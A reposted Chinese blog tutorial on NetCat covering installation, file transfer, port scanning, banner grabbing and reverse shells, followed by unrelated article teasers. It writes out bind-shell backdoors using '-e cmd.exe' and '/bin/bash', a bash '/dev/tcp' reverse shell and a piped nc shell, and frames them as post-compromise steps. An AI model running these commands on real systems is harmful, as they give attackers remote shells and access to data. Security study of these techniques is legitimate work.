探索NetCat:网络流量监测与数据传输的利器

news2024/11/23 1:02:44

从简单的数据传输到复杂的网络调试,NetCat的灵活性和多功能性让人赞叹不已,在这篇文章中我将深入探讨NetCat的魅力,揭示它的基本功能、实用技巧以及在日常工作中的应用场景,发现如何用这一小工具提升的网络技能与效率。

目录

NetCat安装教程

NetCat基础使用

NetCat文件传输

NetCat端口探测

NetCat反弹shell


注意!!!:本文所述的网络安全攻击手段仅供学习和研究目的,旨在提高用户对网络安全威胁的认识,帮助读者加强自身的防护措施。任何使用本文内容进行的攻击行为,均由实施者自行承担相关责任。博主对此不承担任何法律责任或损失赔偿义务。请遵循法律法规,确保在合法的范围内使用所学知识。

NetCat安装教程

        Netcat简称为nc,被称为“网络工具的瑞士军刀”,是一个功能强大的网络工具,用于读写网络连接中的数据,它支持多种协议(如TCP和UDP),能够在网络上进行数据传输、调试、监控和安全测试,它的命令行界面使得使用者可以快速实现各种网络任务,非常适合系统管理员和网络安全专业人员使用,其下载地址为:地址 ,我们就以下载1.12的举例吧:

当然下载解压之后,如果电脑没有提前关闭杀软的话nc会被当成病毒给杀掉,我们可以打开杀软将杀掉的exe文件恢复并添加到信任区即可,然后我们点击键盘win键输入“高级系统设置”,点击环境变量,找到系统变量里面的path然后点击编辑:

然后将我们解压好netcat工具的目录编辑到里面,然后一直点击确定即可:

然后我们win+r输入cmd打开终端,在终端中输入nc -help,出现如下情况说明我们安装成功:

NetCat基础使用

创建服务端与客户端连接:这里我们可以借助netcat来分别创建服务端与客户端,然后进行两者简易的通信功能,具体如下所示:

01)创建服务端可以执行如下方法进行操作,cmd打开一个终端执行如下命令:

// -l: 启动监听模式 -p: 监听某个端口的连接
nc -l -p [本地端口]

02)创建客户端可以执行如下方法进行操作,cmd打开第二个终端执行如下命令:

nc [服务器ip] [服务器ip开启的端口号]

接下来在服务器中编写相应的信息进行发送,可以看到我们的客户端能及时的收到我们的消息:

返回shell使用:当我们在服务端执行相应的命令之后,在客户端我们就可以执行命令拿到服务端的cmd权限,当拿到目标机器并且目标机器上存在netcat之后,可以使用netcat建立后门方便后期执行目标机器命令的功能:具体如下所示:

弹回Window系统下的shell可以采取如下方式进行:

01)创建服务端可以执行如下方法进行操作,cmd打开一个终端执行如下命令:

// -l: 启动监听模式 -p: 监听某个端口的连接 
// -e cmd.exe: 表示连接之后返回给连接段的程序是cmd.exe
nc -l -p [本地端口] -e cmd.exe

02)创建客户端这里我们使用虚拟机kail系统,虚拟机网络连接方式选择NAT方式,切换到root权限终端执行如下命令:

nc [ip地址] [端口号]

弹回Linux系统下的shell可以采取如下方式进行: 

01)创建服务端可以执行如下方法进行操作,打开一个终端执行如下命令:

nc -l -p [端口号] -e /bin/bash

02)创建客户端这里我们使用window系统,终端执行如下命令:

当然netcat还有一些其他的使用命令,这里就不再一一赘述了,具体可参考如下:

// 参数 + 说明
-C 类似-L选项,一直不断连接[1.13版本新加的功能]
-d 后台执行
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway 源路由跳数,最大值为8(source-routing hop point[s],up to 8)
-G num 源路由指针:4,8,12,... (source-routing pointer: 4,8,12,...)
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式,[netcat-1.15可以:远程nc -ulp port -e cmd.exe,本地nc -u ip port连接,得到一个shell.]
-v 详细输出——用两个-v可得到更详细的内容
-w secs 指定超时的时间
-z 将输入输出关掉——用于扫描时

NetCat文件传输

NetCat工具还提供了文件传输的操作,具体的使用场景主要有以下两个方面可以进行:

取证:当目标机器被黑客攻击之后取证任意可以利用NC的文件传输功能来获取目标机器上的文件内容,避免直接在目标机器上进行操作造成的取证误差。

下载:当目标机器上有一些敏感文件内容无非正常下载时,可以利用NC来进行文件传输。

客户端向服务端传输:接下来我们可以实现在客户端中往服务端传递文件,具体如下所示:

01)创建服务端,终端执行如下命令将接收的文件重命名然后报错当前路径:

nc -l -p 4444 > test.txt

02)创建客户端,终端执行如下命令将当前路径下的文件传输给具体ip和端口的服务器:

nc [服务器ip] [服务器端口] < [传输文件]

服务端向客户端传输:传输方式无非是和上面的命令反着来而已,这里我们再将上面传输给服务端的test.txt文件再传递给客户端,这里直接演示:

NetCat端口探测

当获取到目标权限之后,如果目标机器没有任何途径可以对内网进行探测,但此时刚好有一个netcat的情况下,就可以使用netcat对目标机器进行内网ip的一个端口扫描,具体使用的命令如下所示:

// -v: 表示对错误进行详细输出
// -n: 不对目标机进行DNS解析
// -z: zero I/O 模式,专业对端口扫描,表示对目标IP发送的数据包不包含任何payload
// -w1: 超时设置1秒
nc -v -n -z -w1 [目标ip] [开始端口-结束端口]

如下我们对我们目标主机进行一个端口扫描:

当然如果要扫描范围的端口的话可能还需要等待一段时间,如果仅仅是扫描单个端口的话直接输入单个端口即可,扫描的非常迅速:

如果向查看本机的端口开放情况,可以终端执行 netstat -ano 命令进行查看:

Banner抓取:Banner是网络服务在连接时发送的初始信息,通常包含关于该服务的名称、版本号和其他相关信息,这些信息可以帮助用户或安全专家识别正在运行的服务,了解其配置和潜在的漏洞:

使用Netcat进行Banner抓取是指通过连接到某个网络服务(如HTTP、FTP、SMTP等)并获取服务的“横幅”(banner)信息,这个横幅通常包含关于服务版本、协议和其他有用信息,能够帮助安全专家识别潜在的漏洞或配置问题,具体命令如下所示:

// echo " " 使用echo输出什么都没有的" "
// | 通过管道连接发送到对应端口服务上 
echo " " | nc -v -n -w1 [目标地址] [开始端口-结束端口]

如果端口开放的情况下,端口扫描就会顺便把该端口的banner信息打印出来:

UDP端口扫描:有时候目标主机上有一些防护软件(防火墙),我们不能通过上面常规的TCP去扫描它的端口服务,这个时候我们就可以使用UDP对目标进行扫描,可以简单的绕过防火墙缺点是扫描的结果可能不是太准确,具体命令如下所示:

// -u: 参数使用UDP
nc -u -z -v [目标IP] [目标端口]

NetCat反弹shell

如果纯真某些时候拿到服务器权限之后想要设置一个反弹shell,但是目标服务器上没有安装netcat的情况下,这里时候我们就需要采取别的方式进行处理了,这里我们以bash反弹shell的方向进行举例说明:

1)客户端监听接收netcat命令,终端执行如下命令:

nc -lvp [监听端口]

2)没有安装nc的服务器反弹shell命令,终端执行如下命令:

bash -i >& /dev/tcp/[客户端ip]/[客户端监听端口] 0>&1

命令解释介绍

bash -i >& /dev/tcp/ip/port 0>&1

在命令中bash-i表示已交互模式运行bashshell。重定向符>&,如果是在其后加文件描述符,是将bash-i交互模式传递给文件描述符,而如果其后是文件,则将bash-i交互模式传递给文件。

dev/tcp/ip/port:表示传递给远程主机的IP地址对应的端口

文件描述符:0标准输入、1标准输出、2错误输入输出

命令中的0>&1表示将标准输入重定向到标准输出,实现远程的属于可以在远程输出对应内容

达到的效果如下所示,可以看到我们拿到了我们的linux服务器的shell,并且可以查看其文件信息了,这里有一个编码问题,后期处理掉即可:

如果拿到服务器权限之后想要设置一个反弹shell,可能存在一些防护软件或防火墙配置原因不支持nc的-e参数命令,这里我们可以采用如下的方式进行解决:

1)客户端同时监听两个端口(一个端口作为输入;另一个作为输出),打开两个终端执行:

// 终端1
nc -lvp 4445
// 终端2
nc -lvp 4446

2)服务端执行如下反弹shell命令:

nc ip port | /bin/bash | nc ip port

在上面命令中,在攻击测试机器上开启两个NC,其中一个作为输入,另一个作为输出,目标机器上,使用管道来重定向输入和输出,输入通过管道传给/bin/bash再通过管道来传递给输出,具体如下所示:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2231576.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

提高交换网络可靠性之链路聚合

转载请注明出处 该实验为链路聚合的配置实验。 1.改名&#xff0c;分别将交换机1和交换机2改名为S1&#xff0c;S2&#xff0c;然后查看S1&#xff0c;S2的STP信息。以交换机1为例&#x1f447;。 2.交换机S1&#xff0c;S2上创建聚合端口&#xff0c;将端口加入聚合端口。以S…

Kubernetes:(三)Kubeadm搭建K8s 1.20集群

文章目录 一、Kubeadm安装流程二、实验1.环境准备2.所有节点安装kubeadm&#xff0c;kubelet和kubectl&#xff08;除了Harbor节点&#xff09;3.部署 Dashboard4.安装Harbor私有仓库 一、Kubeadm安装流程 集群名称IP地址安装软件master&#xff08;2C/4G&#xff0c;cpu核心数…

使用MongoDB Atlas构建无服务器数据库

&#x1f493; 博客主页&#xff1a;瑕疵的CSDN主页 &#x1f4dd; Gitee主页&#xff1a;瑕疵的gitee主页 ⏩ 文章专栏&#xff1a;《热点资讯》 使用MongoDB Atlas构建无服务器数据库 MongoDB Atlas 简介 注册账户 创建集群 配置网络 设置数据库用户 连接数据库 设计文档模式…

Windows 10 安装使用Docker踩过的坑和解决-31/10/2024

目录 环境版本 一、Docker Desktop双击启动没反应&#xff0c;open //./pipe/dockerDesktopLinuxEngine: The system cannot find the file specified. 二、Docker Desktop运行run命令时显示错误HTTP code 500 并且错误大意是服务器拒绝访问 三、Docker Engine stopped/启动…

parted 磁盘分区

目录 磁盘格式磁盘分区文件系统挂载使用扩展 - parted、fdisk、gdisk 区别 磁盘格式 parted /dev/vdcmklabel gpt # 设置磁盘格式为GPT p # 打印磁盘信息此时磁盘格式设置完成&#xff01; 磁盘分区 开始分区&#xff1a; mkpart data_mysql # 分区名&…

论 ONLYOFFICE:开源办公套件的深度探索

公主请阅 引言第一部分&#xff1a;ONLYOFFICE 的历史背景1.1 开源软件的崛起1.2 ONLYOFFICE 的发展历程 第二部分&#xff1a;ONLYOFFICE 的核心功能2.1 文档处理2.2 电子表格2.3 演示文稿 第三部分&#xff1a;技术架构与兼容性3.1 技术架构3.2 兼容性 第四部分&#xff1a;部…

NVIDIA GeForce RTX 4090 Mobile 16G 性能分析

最近在看台式电脑&#xff0c;看到1W内居然能买到 i9-14900HX、RTX4090 16G&#xff0c;感觉不对劲&#xff0c;就离谱~ 4090的显卡什么时候出了16G的&#xff0c;而且还这这么便宜&#xff1f;&#xff1f;&#xff1f;&#xff1f; 目录 1、NVIDIA官网查查4090 2、对比RT…

【ARCGIS实验】地形特征线的提取

目录 一、提取不同位置的地形剖面线 二、将DEM转化为TIN 三、进行可视分析 四、进行山脊、山谷等特征线的提取 1、正负地形提取&#xff08;用于校正&#xff09; 2、山脊线提取 3、山谷线的提取 4、河网的提取 5、流域的分割 五、鞍部点的提取 1、背景 2、目的 3…

STM32使用串口下载程序

STM32使用串口下载程序 FluMcu软件下载地址 单片机在线编程网 STM32 MCU启动模式配置(Boot Configuration) 单片机复位后&#xff0c;SYSCLK的第4个上升沿&#xff0c;BOOT引脚上的值将锁存&#xff0c;用户可以通过设置BOOT0和BOOT1引脚的值&#xff0c;来选择复位后的启动…

MATLAB口罩检测

在当今疫情严峻的背景下&#xff0c;口罩成为了人们必备的防护用品。然而&#xff0c;市面上却出现了大量假冒伪劣口罩。为了帮助大家准确辨别真假口罩&#xff0c;小编将为大家介绍一种基于MATLAB的口罩检测方法。 1.口罩检测原理 通过图像处理技术&#xff0c;借助MATLAB强大…

网络层4——网络控制协议ICMP

目录 一、格式 二、种类 1、差错报文 &#xff08;1&#xff09;终点不可达 &#xff08;2&#xff09;时间超过 &#xff08;3&#xff09;参数问题 &#xff08;4&#xff09;改变路由&#xff08;重定向&#xff09; &#xff08;5&#xff09;差错报文数据字段 ​编…

RHCE——web

一&#xff0c;什么是www www是world wide web的缩写&#xff0c;也就是全球信息广播的意思。通常说的上网就是使用www来查询用户 所需要的信息。www可以结合文字、图形、影像以及声音等多媒体&#xff0c;并通过可以让鼠标单击超链接的方 式将信息以Internet传递到世界各处去…

GraphQL系列 - 第2讲 Spring集成GraphQL

目录 一、maven依赖二、Schema 定义三、代码集成3.1 创建模型类3.2 创建服务类3.3 创建控制器类 四、单元测试五、实际 HTTP 请求测试5.1 查询单个 Person5.2 查询所有 People5.3 添加 Person 六、其他6.1 开启graphiql6.2 开启schema查看端点 一、maven依赖 首先&#xff0c;…

如何将字母l劈开

如何将字母l从顶到底劈开&#xff1f; 一、分两步&#xff0c;将字母 l 劈开 个人认为&#xff0c;将字母l劈开&#xff0c;需要做两件事情&#xff0c;或者说可以通过如下两个步骤来实现&#xff1a; 【1】证明字母 l 是一个象形字母&#xff1a;即字母l它的本质&#xff0…

linux驱动-输入子系统框架讲解

Input 子系统包括三个层次&#xff0c;分别是设备驱动层&#xff0c;核心层&#xff0c;事件处理层。 为什么要分层呢? 比如我们开发了一个驱动程序 a.c&#xff0c;其中里面有 100 行代码是通用的&#xff0c;然后我又开发了一个 驱动程序 b.c&#xff0c;那这 100 行…

【C/C++】字符/字符串函数(0)(补充)——由ctype.h提供

零.导言 除了字符分类函数&#xff0c;字符转换函数也是一类字符/字符串函数。 C语言提供了两种字符转换函数&#xff0c;分别是 toupper &#xff0c; tolower。 一.什么是字符转换函数&#xff1f; 顾名思义&#xff0c;即转换字符的函数&#xff0c;如大写字母转小写字母&am…

ssh和ssl的区别在哪些方面?

在网络安全和数据保护领域&#xff0c;谈话中经常提到的两个词是SSH(安全外壳)和SSL(安全套接字层)。尽管这两者在在线通信安全中都具有重要意义&#xff0c;但它们的使用目的不同&#xff0c;并且处于网络堆栈的不同级别。本文将深入分析 SSH 和 SSL 主要区别在哪些方面。 概念…

简单的ELK部署学习

简单的ELK部署学习 1. 需求 我们公司现在使用的是ELK日志跟踪&#xff0c;在出现问题的时候&#xff0c;我们可以快速定为到问题&#xff0c;并且可以对日志进行分类检索&#xff0c;比如对服务名称&#xff0c;ip , 级别等信息进行分类检索。此文章为本人学习了解我们公司的…

2024年11月3号深铁璟城人才房看房记

我为什么看深铁璟城二期? 答&#xff1a;价格哈。 最开始看大康书记的文章是预测2.88万&#xff0c;由于个人经济缘故保障房超过2.5w就不去看房。没想到周五的时候&#xff0c;人才房群里销售精英说均价为2.4~2.5w了&#xff0c;这不就是和润珑苑的定价策略接近嘛&#xff1f;…

零基础Java第十二期:类和对象(三)

目录 一、static成员&#xff08;补&#xff09; 1.1. static修饰成员方法 1.2. static成员变量初始化 二、代码块 2.1. 静态代码块和实例代码块 ​三、对象的打印 一、static成员&#xff08;补&#xff09; 1.1. static修饰成员方法 public class Linear {public st…